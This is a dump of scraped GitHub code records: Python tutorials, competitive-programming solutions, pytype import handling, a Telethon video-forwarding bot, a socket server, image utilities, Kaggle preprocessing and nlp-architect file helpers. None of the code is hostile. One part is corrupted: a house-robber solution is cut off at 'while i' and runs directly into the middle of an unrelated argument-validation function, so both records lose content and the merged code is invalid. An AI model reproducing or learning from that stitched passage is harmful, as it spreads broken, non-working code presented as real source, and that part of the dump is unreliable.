输出3\nprint(next(generator_with_return))\n# 报错,输出 StopIteration\n# print(next(generator_with_return))\n\n# 判断是不是生成器\n\nfrom inspect import isgeneratorfunction\n\n\ndef test_function():\n print(\"test\")\n\n\n# True\nprint(isgeneratorfunction(countdown))\n# False\nprint(isgeneratorfunction(test_function))\n# False\nprint(isgeneratorfunction(lambda: print()))\n\n\n# 简单实践,输出斐波那契数列\n# 生成器本质上是一个产生迭代器的函数,作用类似于前面的自定义迭代器类\ndef fibonacci(n):\n count, a, b = 1, 1, 2\n while count <= n:\n yield a\n a, b = b, a + b\n count += 1\n\n\nfibonacci_generator = fibonacci(5)\nfor i in iter(fibonacci_generator):\n print(i, end=\" | \")\n\nprint()\n\n\n# yield关键字的简单测试\n# 通过生成器,我们可以把一个方法分成两段运行,第一段是从方法开始到yield 语句,第二段是从yield的下一句到方法末尾,很有意思\ndef yield_test():\n print(\"yield before\")\n # yield 返回 None\n yield\n print(\"yield after\")\n\n\nyield_value = yield_test()\nnext(yield_value)\n# 给个默认值,next读取不到值的时候不会爆 StopIteration 错误\nnext(yield_value,\"end\")\n\n","repo_name":"liangkang1436/PythonLearn","sub_path":"iteration/iteration.py","file_name":"iteration.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"13780413579","text":"import sys\nsys.setrecursionlimit(10**9)\n\nT = int(sys.stdin.readline().strip())\nchoice = []\nvisited = []\ncycle = []\ncnt = [0]\n\ndef dfs(idx):\n global cycle\n\n next_num = choice[idx]\n visited[idx] = 1\n cycle.append(idx)\n\n if visited[next_num] == 1:\n if next_num not in cycle:\n return\n while cycle:\n num = cycle.pop()\n cnt[0] += 1\n if num == next_num:\n break\n return\n \n \n dfs(next_num)\n\nfor _ in range(T):\n n = int(sys.stdin.readline().strip())\n cnt[0] = 0\n choice = [0] + list(map(int, sys.stdin.readline().strip().split()))\n visited = [0] * (n + 1)\n \n for i in range(1, n + 1):\n if visited[i] == 1:\n continue\n cycle = []\n dfs(i)\n print(n - cnt[0])","repo_name":"Yangseyeon/BOJ","sub_path":"03. 
Gold/9466.py","file_name":"9466.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"28890649231","text":"\"\"\"Handling of module and package related details.\"\"\"\n\nimport dataclasses\nfrom typing import Any\n\nfrom pytype import file_utils\nfrom pytype import module_utils\nfrom pytype.pyi import types\nfrom pytype.pytd import pytd\nfrom pytype.pytd.parse import parser_constants\n\n_ParseError = types.ParseError\n\n\n@dataclasses.dataclass\nclass Import:\n \"\"\"Result of processing an import statement.\"\"\"\n\n pytd_node: Any\n name: str\n new_name: str\n qualified_name: str = \"\"\n\n def pytd_alias(self):\n return pytd.Alias(self.new_name, self.pytd_node)\n\n\nclass Module:\n \"\"\"Module and package details.\"\"\"\n\n def __init__(self, filename, module_name):\n self.filename = filename\n self.module_name = module_name\n is_package = file_utils.is_pyi_directory_init(filename)\n self.package_name = module_utils.get_package_name(module_name, is_package)\n self.parent_name = module_utils.get_package_name(self.package_name, False)\n\n def _qualify_name_with_special_dir(self, orig_name):\n \"\"\"Handle the case of '.' and '..' as package names.\"\"\"\n if \"__PACKAGE__.\" in orig_name:\n # Generated from \"from . import foo\" - see parser.yy\n prefix, _, name = orig_name.partition(\"__PACKAGE__.\")\n if prefix:\n raise _ParseError(f\"Cannot resolve import: {orig_name}\")\n return f\"{self.package_name}.{name}\"\n elif \"__PARENT__.\" in orig_name:\n # Generated from \"from .. import foo\" - see parser.yy\n prefix, _, name = orig_name.partition(\"__PARENT__.\")\n if prefix:\n raise _ParseError(f\"Cannot resolve import: {orig_name}\")\n if not self.parent_name:\n raise _ParseError(\n f\"Cannot resolve relative import ..: Package {self.package_name} \"\n \"has no parent\"\n )\n return f\"{self.parent_name}.{name}\"\n else:\n return None\n\n def qualify_name(self, orig_name):\n \"\"\"Qualify an import name.\"\"\"\n if not self.package_name:\n return orig_name\n rel_name = self._qualify_name_with_special_dir(orig_name)\n if rel_name:\n return rel_name\n if orig_name.startswith(\".\"):\n name = module_utils.get_absolute_name(self.package_name, orig_name)\n if name is None:\n raise _ParseError(\n f\"Cannot resolve relative import {orig_name.rsplit('.', 1)[0]}\")\n return name\n return orig_name\n\n def process_import(self, item):\n \"\"\"Process 'import a, b as c, ...'.\"\"\"\n if isinstance(item, tuple):\n name, new_name = item\n else:\n name = new_name = item\n if name == new_name == \"__builtin__\":\n # 'import __builtin__' should be completely ignored; this is the PY2 name\n # of the builtins module.\n return None\n module_name = self.qualify_name(name)\n as_name = self.qualify_name(new_name)\n t = pytd.Module(name=as_name, module_name=module_name)\n return Import(pytd_node=t, name=name, new_name=new_name)\n\n def process_from_import(self, from_package, item):\n \"\"\"Process 'from a.b.c import d, ...'.\"\"\"\n if isinstance(item, tuple):\n name, new_name = item\n else:\n name = new_name = item\n qualified_name = self.qualify_name(f\"{from_package}.{name}\")\n # We should ideally not need this check, but we have typing\n # special-cased in some places.\n if not qualified_name.startswith(\"typing.\") and name != \"*\":\n # Mark this as an externally imported type, so that AddNamePrefix\n # does not prefix it with the current package name.\n qualified_name = 
(parser_constants.EXTERNAL_NAME_PREFIX +\n qualified_name)\n t = pytd.NamedType(qualified_name)\n if name == \"*\":\n # A star import is stored as\n # 'imported_mod.* = imported_mod.*'. The imported module needs to be\n # in the alias name so that multiple star imports are handled\n # properly. LookupExternalTypes() replaces the alias with the\n # contents of the imported module.\n assert new_name == name\n new_name = t.name\n return Import(pytd_node=t, name=name, new_name=new_name,\n qualified_name=qualified_name)\n","repo_name":"google/pytype","sub_path":"pytype/pyi/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":4405,"dataset":"github-code","pt":"36"} +{"seq_id":"852830410","text":"from telethon import TelegramClient, events\nfrom decouple import config\nimport logging\nfrom telethon.sessions import StringSession\n\nlogging.basicConfig(format='[%(levelname) 5s/%(asctime)s] %(name)s: %(message)s', level=logging.WARNING)\n\nprint(\"Starting...\")\n\nAPP_ID = APP_ID\nAPI_HASH = \"API_HASH\"\nSESSION = \"SESSION\"\nFROM_ = \"FROM_\"\nTO_ = \"TO_\"\n\n\nFROM = [int(i) for i in FROM_.split()]\nTO = [int(i) for i in TO_.split()]\n\ntry:\n BotzHubUser = TelegramClient(StringSession(SESSION), APP_ID, API_HASH)\n BotzHubUser.start()\nexcept Exception as ap:\n print(f\"ERROR - {ap}\")\n exit(1)\n\n@BotzHubUser.on(events.NewMessage(incoming=True, chats=FROM))\nasync def sender_bH(event):\n if event.message.video: # Only forward if the message contains a video\n for i in TO:\n try:\n await BotzHubUser.send_message(\n i,\n event.message\n )\n print(f\"Video forwarded from {event.chat_id} to {i}\")\n except Exception as e:\n print(e)\n\nprint(\"Bot has started.\")\nBotzHubUser.run_until_disconnected()\n \n","repo_name":"sureshkim/Expazzoo","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"40253263094","text":"import socket\nfrom inspect import cleandoc\nfrom math import sqrt\n\nHOST = 'localhost'\nPORT = 50001\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST, PORT))\n s.listen(5)\n print(f'Socket listening on {HOST}:{PORT}')\n print('Waiting for client connections ...')\n\n while True: \n conn, addr = s.accept() # accept client connection\n print(f'Connected by {addr}')\n command_data = ''\n\n base_width = 0\n pyramid_height = 0\n triangle_height = 0\n\n while True:\n bytes_data = conn.recv(1024) # receive data\n command_data = bytes_data.decode()\n\n if ('set-params' in command_data.lower()):\n params = command_data.lower().split()\n for index, option in enumerate(params):\n if index > 0:\n if 's=' in option:\n input_value = option.strip()[2:]\n if input_value.isnumeric():\n base_width = int(input_value)\n elif 't=' in option:\n input_value = option.strip()[2:]\n if input_value.isnumeric():\n pyramid_height = int(input_value)\n elif 'h=' in option:\n input_value = option.strip()[2:]\n if input_value.isnumeric():\n triangle_height = int(input_value)\n if base_width > 0 and pyramid_height > 0:\n triangle_height = sqrt(((base_width/2)**2) + (pyramid_height**2))\n elif base_width > 0 and triangle_height > 0:\n pyramid_height = sqrt((triangle_height**2) - ((base_width/2)**2))\n conn.send('Completed'.encode())\n elif ('help-params' in command_data.lower()):\n conn.send(cleandoc(\"\"\"\n s = Length of the pyramid's base side\n t = Height of the pyramid\n h = Slant height of the pyramid's lateral face\n \"\"\").encode())\n elif ('show-params' in command_data.lower()):\n conn.send(cleandoc(f\"\"\"\n s = {base_width}\n t = {pyramid_height}\n h = {triangle_height}\n \"\"\").encode())\n elif ('count' in command_data.lower()):\n area = (base_width**2) + (4 * (0.5 * base_width * triangle_height))\n conn.send(f'{area}'.encode())\n elif command_data.lower() == 'exit':\n conn.close()\n print(f'Connection {addr} closed')\n break\n else:\n conn.send('Unknown command!'.encode())","repo_name":"zavierferodova/Praktikum-Algopro","sub_path":"Praktikum 10/Kegiatan 3/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"26737059504","text":"import os.path\nimport glob\nimport shutil\nimport re\nimport imagesize\nimport threading\nfrom pathlib import Path\n\nfrom PyQt5 import QtWidgets\nfrom langcodes import Language\nfrom PyQt5.QtWidgets import QMessageBox\nfrom PyQt5.QtCore import QRect\nfrom PIL import Image,ImageEnhance,ImageOps\n\nfrom models.const import *\n\ndef find_all_languages():\n\tlanguages = []\n\tfor file in os.listdir(os.path.join(ROOT_DIR, \"languages\")):\n\t\tif re.match(r\"^[a-zA-Z_].*?\\.qm$\", file):\n\t\t\tfile_name = get_file_name(file)\n\t\t\tlanguage_full_name = Language.get(file_name).autonym()\n\t\t\t#print(f\"{file_name}, {language_full_name}\")\n\t\t\tlanguage_full_name = language_full_name.replace(\"(\",\" (\").replace(\")\",\")\")\n\t\t\tlanguages.append({\"name\":language_full_name,\"file\":file_name})\n\tlanguages.sort(key=lambda language: language[\"name\"]) # sort in place; the old bare sorted() call discarded its result\n\treturn languages\n\ndef find_all_themes():\n\tthemes = []\n\tfor file in os.listdir(os.path.join(ROOT_DIR, \"themes\")):\n\t\tif re.match(r\"^[a-zA-Z_].*?\\.qss$\", file):\n\t\t\tfile_name = get_file_name(file)\n\t\t\tif file_name != \"default\":\n\t\t\t\tthemes.append({\"name\":file_name})\n\tthemes.sort(key=lambda theme: theme[\"name\"]) # sort in place; the old bare sorted() call discarded its result\n\treturn themes\n\ndef find_all_fonts():\n\tfonts = []\n\tfor file in os.listdir(os.path.join(ROOT_DIR, \"fonts\")):\n\t\tif re.match(r\"^[a-zA-Z_].*?\\.tt[fc]$\", file):\n\t\t\tfull_path = Path(os.path.join(ROOT_DIR, \"fonts\",file)).as_posix()\n\t\t\tfonts.append({\"name\":file,\"file\":full_path})\n\treturn fonts\n\ndef get_number_of_images_from_folder(folder,num=1,exts=IMAGE_EXTS):\n\tlists = []\n\tfor ext in exts:\n\t\tlists += glob.glob(folder + '/**/*.' 
+ ext, recursive=True)\n\t\tif len(lists) > num > 0:\n\t\t\tbreak\n\tlists.sort()\n\tif len(lists) > num > 0:\n\t\tlists = lists[0:num]\n\treturn lists\n\ndef get_image_list_from_folder(folder,results,main_folder=\"\",exts=IMAGE_EXTS,path=\"\"):\n\tif main_folder == \"\":\n\t\tmain_folder = folder\n\tfiles = sorted(os.listdir(folder))\n\troot_files = []\n\tthreads = []\n\tfor file in files:\n\t\tfull_file = os.path.join(folder,file)\n\t\tfull_file = Path(full_file).as_posix()\n\t\tif os.path.isdir(full_file):\n\t\t\tnew_path = os.path.join(path,file)\n\t\t\tnew_path = Path(new_path).as_posix()\n\t\t\ttmp_threading = threading.Thread(target=get_image_list_from_folder, args=(full_file,results,main_folder,exts,new_path,))\n\t\t\tthreads.append(tmp_threading)\n\t\t\ttmp_threading.start()\n\t\telif get_ext(file) in exts:\n\t\t\t#root_files.append(full_file)\n\t\t\trel_file = Path(os.path.relpath(full_file,main_folder)).as_posix()\n\t\t\troot_files.append(rel_file)\n\n\tfor tmp_threading in threads:\n\t\ttmp_threading.join()\n\n\tif len(root_files) > 0:\n\t\tresults.append({\"path\":path,\"files\":root_files})\n\ndef get_image_list_from_folder_old(folder,exts=IMAGE_EXTS,path=\"\"):\n\tfiles = sorted(os.listdir(folder))\n\troot_files = []\n\tfolder_files = []\n\tfor file in files:\n\t\tfull_file = os.path.join(folder,file)\n\t\tif os.path.isdir(full_file):\n\t\t\ttmp_files = get_image_list_from_folder_old(full_file,exts,os.path.join(path,file))\n\t\t\tif len(tmp_files) > 0:\n\t\t\t\tfolder_files.extend(tmp_files)\n\t\telif get_ext(file) in exts:\n\t\t\troot_files.append(full_file)\n\tresults = []\n\tif len(root_files) > 0:\n\t\tresults.append({\"path\":path,\"files\":root_files})\n\tif len(folder_files) > 0:\n\t\tresults.extend(folder_files)\n\treturn results\n\n\ndef filter_pimage(pimage,contrast=1,sharpness=1,brightness=1,color=1):\n\tnew_pimage = pimage\n\tenhancer = ImageEnhance.Color(new_pimage)\n\tnew_pimage = enhancer.enhance(color)\n\n\tenhancer = ImageEnhance.Contrast(new_pimage)\n\tnew_pimage = enhancer.enhance(contrast)\n\n\tenhancer = ImageEnhance.Brightness(new_pimage)\n\tnew_pimage = enhancer.enhance(brightness)\n\n\tenhancer = ImageEnhance.Sharpness(new_pimage)\n\tnew_pimage = enhancer.enhance(sharpness)\n\n\treturn new_pimage\n\ndef rotate_pimage(pimage,rotate=0,horizontal_flip=False,vertical_flip=False):\n\tnew_pimage = pimage\n\tif rotate > 0:\n\t\tnew_pimage = new_pimage.rotate(-rotate, Image.NEAREST, expand=True)\n\tif horizontal_flip:\n\t\tnew_pimage = ImageOps.mirror(new_pimage)\n\tif vertical_flip:\n\t\tnew_pimage = ImageOps.flip(new_pimage)\n\treturn new_pimage\n\ndef cv_imread(filepath):\n\t# # fix the utf-8 name path!\n\t# cv_img = cv2.imdecode(np.fromfile(filepath,dtype=np.uint8),-1)\n\t# #already is BGR!\n\t# #cv_img = cv2.cvtColor(cv_img,cv2.COLOR_RGB2BGR)\n\t# return cv_img\n\tpass\n\ndef msg_box(message,parent:QtWidgets.QMainWindow = None):\n\tif parent is not None:\n\t\ttitle = parent.windowTitle()\n\telse:\n\t\ttitle = TRSM(\"Comic Toolbox\")\n\tQMessageBox.information(parent, title, message)\n\ndef confirm_box(message,parent:QtWidgets.QMainWindow = None):\n\tif parent is not None:\n\t\ttitle = parent.windowTitle()\n\telse:\n\t\ttitle = TRSM(\"Comic Toolbox\")\n\treply = QMessageBox.question(parent, title, message, QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n\tif reply == QMessageBox.Yes:\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef copy_all_file(from_folder,to_folder):\n\tfor file_name in os.listdir(from_folder):\n\t\tsource = 
os.path.join(from_folder, file_name)\n\t\tdestination = os.path.join(to_folder, file_name)\n\t\tif os.path.isfile(source):\n\t\t\tshutil.copy(source, destination)\n\ndef get_file_name(filename):\n\tname = filename.split('.', 1)[0]\n\treturn name\n\ndef get_ext(file_name):\n\text = file_name.rsplit('.', 1)[-1].lower()\n\treturn ext\n\ndef count_file_in_folder(folder):\n\tpath, dirs, files = next(os.walk(folder))\n\treturn len(files)\n\ndef find_rect_to_fit(p_width,p_height,c_width,c_height):\n\tw_ratio = p_width / c_width\n\th_ratio = p_height / c_height\n\tratio = min(w_ratio,h_ratio)\n\tc_final_width = c_width * ratio\n\tc_final_height = c_height * ratio\n\tc_x = (p_width - c_final_width) / 2.0\n\tc_y = (p_height - c_final_height) / 2.0\n\treturn QRect(c_x,c_y,c_final_width,c_final_height)\n\ndef remove_element_of_tuple(tuple_from,need_remove):\n\ttmp_list = list(tuple_from)\n\ttmp_list.remove(need_remove)\n\treturn tuple(tmp_list)\n\ndef get_image_size(file_name):\n\ttry:\n\t\twidth, height = imagesize.get(file_name)\n\t\tif width > 0 and height > 0:\n\t\t\treturn [width,height]\n\t\telse:\n\t\t\tim = Image.open(file_name)\n\t\t\twidth, height = im.size\n\t\t\tif width > 0 and height > 0:\n\t\t\t\treturn [width, height]\n\texcept Exception:\n\t\t#fallback use PIL\n\t\tim = Image.open(file_name)\n\t\twidth, height = im.size\n\t\tif width > 0 and height > 0:\n\t\t\treturn [width, height]\n\treturn [0, 0]\n\n# # for check GPU usage\n# def get_free_gpu_memory():\n# \tnvmlInit()\n# \th = nvmlDeviceGetHandleByIndex(0)\n# \tinfo = nvmlDeviceGetMemoryInfo(h)\n# \tprint(f'total : {info.total}')\n# \tprint(f'free : {info.free}')\n# \tprint(f'used : {info.used}')\n#\n# \tt = torch.cuda.get_device_properties(0).total_memory\n# \tr = torch.cuda.memory_reserved(0)\n# \ta = torch.cuda.memory_allocated(0)\n# \tf = r - a # free inside reserved\n# \tprint(f't: {t}')\n# \tprint(f'r: {r}')\n# \tprint(f'a: {a}')\n# \tprint(f'f: {f}')\n#\n# \tnvidia_smi.nvmlInit()\n#\n# \tdevice_count = nvidia_smi.nvmlDeviceGetCount()\n# \tfor i in range(device_count):\n# \t\thandle = nvidia_smi.nvmlDeviceGetHandleByIndex(i)\n# \t\tinfo = nvidia_smi.nvmlDeviceGetMemoryInfo(handle)\n# \t\tprint(\"Device {}: {}, Memory : ({:.2f}% free): {}(total), {} (free), {} (used)\".format(i, nvidia_smi.nvmlDeviceGetName(handle), 100*info.free/info.total, info.total, info.free, info.used))\n#\n# \tnvidia_smi.nvmlShutdown()\n\n","repo_name":"freedy82/Comic-Toolbox","sub_path":"models/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7079,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"36"} +{"seq_id":"20156789667","text":"from tp_final.clases_tp_final.db import DB\n\nclass Butaca(object):\n idButaca = None\n id_sala = None\n precio_butaca = None\n\n def Dar_de_Alta_Butaca(self):\n DB.run(\"Insert into Butaca(idButaca,Sala_idSala,precio_butaca) VALUES (\" + str(self.idButaca) + \",\" + str(self.id_sala) +\",\" + str(self.precio_butaca) +\")\")\n\n @staticmethod\n def get_butaca(idButaca):\n cursor_butaca = DB.run(\"Select * from Butaca where idButaca = \"+idButaca+\"\")\n B = Butaca()\n dict = cursor_butaca.fetchone()\n B.idButaca = dict['idButaca']\n B.id_sala = dict['Sala_idSala']\n B.precio_butaca = dict['precio_butaca']\n return 
B\n","repo_name":"politecnicomodelopoo2018/Getar3","sub_path":"tp_final/clases_tp_final/butaca.py","file_name":"butaca.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"8539718014","text":"#check one day, see how all the prices changes\nimport csv \nimport pickle\nimport numpy as np\n\ntrain = []\nfor dnum in range(1,201):\n\tif dnum == 22:\n\t\tpass\n\telse:\n\t\tday = []\n\t\twith open('data/%d.csv'% dnum ) as f:\n\t\t\treader = csv.reader( f, delimiter=',' )\n\t\t\treader.next()\n\t\t\tfor row in reader:\n\t\t\t\tday.append( np.array( map( float, row ) ) )\n\t\tday = np.vstack( day )\n\t\ttrain.append( day )\n\ntest = []\nfor dnum in range(201, 511):\n\tday = []\n\twith open('data/%d.csv'% dnum ) as f:\n\t\treader = csv.reader( f, delimiter=',' )\n\t\treader.next()\n\t\tfor row in reader:\n\t\t\tday.append( np.array( map( float, row ) ) )\n\tday = np.vstack( day )\n\ttest.append( day )\npickle.dump( train, open('output/train.pkl', 'w') )\npickle.dump( test, open( 'output/test.pkl', 'w' ) )\n\ny = []\nwith open( 'trainLabels.csv' ) as f:\n\treader = csv.reader( f, delimiter=',' ) \n\treader.next()\n\tcount = 1\n\tfor row in reader:\n\t\tif count == 22:\n\t\t\tpass\n\t\telse:\n\t\t\ty.append( np.array( map( float, row ) )[1:] )\n\t\tcount += 1\ny = np.vstack( y )\npickle.dump( y, open('output/y.pkl', 'w' ) )\n\n\ntrain_ar = []\ntest_ar = []\nfor i in range( 198 ):\n\tar_train = []\n\tar_test = []\n\tfor j in range(len(train)):\n\t\tar_train.append( train[j][:,i] )\n\tfor j in range(len(test)):\n\t\tar_test.append( test[j][:,i] )\n\tar_train = np.vstack( ar_train )\n\tar_test = np.vstack( ar_test )\n\ttrain_ar.append( ar_train )\n\ttest_ar.append( ar_test )\n\npickle.dump( (train_ar,test_ar), open('output/ar.pkl', 'w' ) )\n\ntrain_diff = []\ntest_diff = []\nfor i in range( 198 ):\n\tdiff_1 = []\n\tdiff_2 = []\n\tfor j in range( len(train)):\n\t\tdiff_day = train[j][1:,i]\n\t\tfor k in reversed( range( 1, len(diff_day) ) ):\n\t\t\tdiff_day[ k ] = diff_day[k] - diff_day[k-1]\n\t\tdiff_1.append( diff_day )\n\tfor j in range( len(test) ):\n\t\tdiff_day = test[j][1:,i]\n\t\tfor k in reversed( range( 1, len(diff_day) ) ):\n\t\t\tdiff_day[ k ] = diff_day[k] - diff_day[k-1]\n\t\tdiff_2.append( diff_day )\n\tdiff_1 = np.vstack( diff_1 )\n\tdiff_2 = np.vstack( diff_2 )\n\ttrain_diff.append( diff_1 )\n\ttest_diff.append( diff_2 )\npickle.dump( (train_diff, test_diff), open('output/diff.pkl', 'w') )\n\n\ninst_len = 198 \nout_len = 244\n\n'''\nfrom pylab import *\n\nday1 = train[0]\nx = range( 0, day1.shape[0] )\nfor t in range( inst_len + 1 ):\n\tplot( x, day1[:, t] )\nshow()\n'''\n","repo_name":"namhyo01/kaggle_study","sub_path":"battlefin-s-big-data-combine-forecasting-challenge/@BigBear/dataProcess.py","file_name":"dataProcess.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"23347436331","text":"class Solution:\n def rob(self, nums: List[int]) -> int:\n if not nums:\n return 0\n if len(nums)==1:\n return nums[0]\n if len(nums)==2:\n return max(nums[0], nums[1])\n \n \n dp0 = {}\n dp1 = {}\n \n dp0[0] = 0\n dp0[1] = nums[0]\n \n dp1[0] = 0\n dp1[1] = nums[1]\n \n i=2\n j = 2\n \n while i= 4:\n name = \"of \" + arg[4] if len(arg) == 5 else \"\"\n arg_min = arg[2]\n arg_max = arg[3]\n if hasattr(arg_val, \"__len__\"):\n val = \"Length\"\n num = len(arg_val)\n else:\n val = \"Value\"\n num = 
arg_val\n if arg_min is not None and num < arg_min:\n raise ValueError(\"{} {} must be greater or equal to {}\".format(val, name, arg_min))\n if arg_max is not None and num >= arg_max:\n raise ValueError(\"{} {} must be less than {}\".format(val, name, arg_max))\n\n\ndef validate_existing_filepath(arg):\n \"\"\"Validates an input argument is a path string to an existing file.\"\"\"\n validate((arg, str, 0, 255))\n if not os.path.isfile(arg):\n raise ValueError(\"{0} does not exist.\".format(arg))\n return arg\n\n\ndef validate_existing_directory(arg):\n \"\"\"Validates an input argument is a path string to an existing directory.\"\"\"\n arg = os.path.abspath(arg)\n validate((arg, str, 0, 255))\n if not os.path.isdir(arg):\n raise ValueError(\"{0} does not exist\".format(arg))\n return arg\n\n\ndef validate_existing_path(arg):\n \"\"\"Validates an input argument is a path string to an existing file or directory.\"\"\"\n arg = os.path.abspath(arg)\n validate((arg, str, 0, 255))\n if not os.path.exists(arg):\n raise ValueError(\"{0} does not exist\".format(arg))\n return arg\n\n\ndef validate_parent_exists(arg):\n \"\"\"Validates an input argument is a path string, and its parent directory exists.\"\"\"\n arg = os.path.abspath(arg)\n dir_arg = os.path.dirname(os.path.abspath(arg))\n if validate_existing_directory(dir_arg):\n return arg\n return None\n\n\ndef valid_path_append(path, *args):\n \"\"\"\n Helper to validate passed path directory and append any subsequent\n filename arguments.\n\n Arguments:\n path (str): Initial filesystem path. Should expand to a valid\n directory.\n *args (list, optional): Any filename or path suffices to append to path\n for returning.\n Returns:\n (list, str): path prepended list of files from args, or path alone if\n no args specified.\n Raises:\n ValueError: if path is not a valid directory on this filesystem.\n \"\"\"\n full_path = os.path.expanduser(path)\n res = []\n if not os.path.exists(full_path):\n os.makedirs(full_path)\n if not os.path.isdir(full_path):\n raise ValueError(\"path: {0} is not a valid directory\".format(path))\n for suffix_path in args:\n res.append(os.path.join(full_path, suffix_path))\n if len(res) == 0:\n return path\n if len(res) == 1:\n return res[0]\n return res\n\n\ndef sanitize_path(path):\n s_path = os.path.normpath(\"/\" + path).lstrip(\"/\")\n assert len(s_path) < 255\n return s_path\n\n\ndef check(validator):\n class CustomAction(argparse.Action):\n def __call__(self, parser, namespace, values, option_string=None):\n validator(values)\n setattr(namespace, self.dest, values)\n\n return CustomAction\n\n\ndef check_size(min_size=None, max_size=None):\n class CustomAction(argparse.Action):\n def __call__(self, parser, namespace, values, option_string=None):\n validate((values, self.type, min_size, max_size, self.dest))\n setattr(namespace, self.dest, values)\n\n return CustomAction\n\n\ndef validate_proxy_path(arg):\n \"\"\"Validates an input argument is a valid proxy path or None\"\"\"\n proxy_validation_regex = re.compile(\n r\"^(?:http|ftp)s?://\" # http:// or https://\n r\"(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|\"\n r\"localhost|\" # localhost...\n r\"\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})\" # ...or ip\n r\"(?::\\d+)?\" # optional port\n r\"(?:/?|[/?]\\S+)$\",\n re.IGNORECASE,\n )\n if arg is not None and re.match(proxy_validation_regex, arg) is None:\n raise ValueError(\"{0} is not a valid proxy path\".format(arg))\n return arg\n\n\ndef validate_boolean(arg):\n 
\"\"\"Validates an input argument of type boolean\"\"\"\n if arg.lower() not in [\"true\", \"false\"]:\n raise argparse.ArgumentTypeError(\"expected true | false argument\")\n return arg.lower() == \"true\"\n\n\ndef load_json_file(file_path):\n \"\"\"load a file into a json object\"\"\"\n try:\n with open(file_path) as small_file:\n return json.load(small_file)\n except OSError as e:\n print(e)\n print(\"trying to read file in blocks\")\n with open(file_path) as big_file:\n json_string = \"\"\n while True:\n block = big_file.read(64 * (1 << 20)) # Read 64 MB at a time;\n json_string = json_string + block\n if not block: # Reached EOF\n break\n return json.loads(json_string)\n\n\ndef json_dumper(obj):\n \"\"\"for objects that have members that cant be serialized and implement toJson() method\"\"\"\n try:\n return obj.toJson()\n except Exception:\n return obj.__dict__\n\n\ndef load_files_from_path(dir_path, extension=\"txt\"):\n \"\"\"load all files from given directory (with given extension)\"\"\"\n files = [\n os.path.join(dir_path, f)\n for f in os.listdir(dir_path)\n if os.path.isfile(os.path.join(dir_path, f)) and f.endswith(extension)\n ]\n files_data = []\n for f in files:\n with open(f) as fp:\n files_data.append(\" \".join(map(str.strip, fp.readlines())))\n return files_data\n\n\ndef create_folder(path):\n if path:\n if not os.path.exists(path):\n os.makedirs(path)\n\n\ndef download_unzip(\n url: str, sourcefile: str, unzipped_path: str or PathLike, license_msg: str = None\n):\n \"\"\"Downloads a zip file, extracts it to destination, deletes the zip file. If license_msg is\n supplied, user is prompted for download confirmation.\"\"\"\n dest_parent = Path(unzipped_path).parent\n\n if not os.path.exists(unzipped_path):\n if license_msg is None or license_prompt(license_msg, urlparse(url).netloc):\n zip_path = dest_parent / sourcefile\n makedirs(dest_parent, exist_ok=True)\n download_unlicensed_file(url, sourcefile, zip_path)\n print(\"Unzipping...\")\n uncompress_file(zip_path, dest_parent)\n return unzipped_path\n\n\ndef line_count(file):\n \"\"\"Utility function for getting number of lines in a text file.\"\"\"\n count = 0\n with open(file, encoding=\"utf-8\") as f:\n for _ in f:\n count += 1\n return count\n\n\ndef prepare_output_path(output_dir: str, overwrite_output_dir: str):\n \"\"\"Create output directory or throw error if exists and overwrite_output_dir is false\"\"\"\n if os.path.exists(output_dir) and os.listdir(output_dir) and not overwrite_output_dir:\n raise ValueError(\n \"Output directory ({}) already exists and is not empty. 
Use --overwrite_output_dir \"\n \"to overcome.\".format(output_dir)\n )\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n","repo_name":"IntelLabs/nlp-architect","sub_path":"nlp_architect/utils/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":11915,"program_lang":"python","lang":"en","doc_type":"code","stars":2921,"dataset":"github-code","pt":"36"} +{"seq_id":"24030965236","text":"import functools\n\nclass Corrupted(Exception):\n\n def __init__(self, char):\n self.char = char\n\n\npush_pop_map = {\"(\": \")\", \"[\": \"]\", \"{\": \"}\", \"<\": \">\"}\npush_chars = set(push_pop_map.keys())\npop_chars = set(push_pop_map.values())\nerror_score = {\")\": 3, \"]\": 57, \"}\": 1197, \">\": 25137}\nincomplete_score = {\")\": 1, \"]\": 2, \"}\": 3, \">\": 4}\n\n\nwith open(\"input.txt\") as f:\n lines = [line.strip() for line in f.readlines()]\n for line in lines: # Input consistency\n assert len(set(line) - push_chars - pop_chars) == 0\n\n\ndef parse_line(line):\n current_push_char = line[0]\n assert current_push_char in push_chars # Invariant\n remaining = line[1:]\n\n if remaining == \"\": # Incomplete\n return \"\", [push_pop_map[current_push_char]]\n while remaining[0] in push_chars:\n remaining, missing_closing_chars = parse_line(remaining)\n if remaining == \"\": # Incomplete\n return \"\", missing_closing_chars + [push_pop_map[current_push_char]]\n\n if remaining[0] == push_pop_map[current_push_char]:\n return remaining[1:], []\n raise Corrupted(remaining[0])\n\n\ntotal_error_score = 0\nincomplete_scores_list = []\nfor line in lines:\n try:\n if not line:\n continue\n if line[0] not in push_chars:\n raise Corrupted(line[0])\n _, missing_closing_chars = 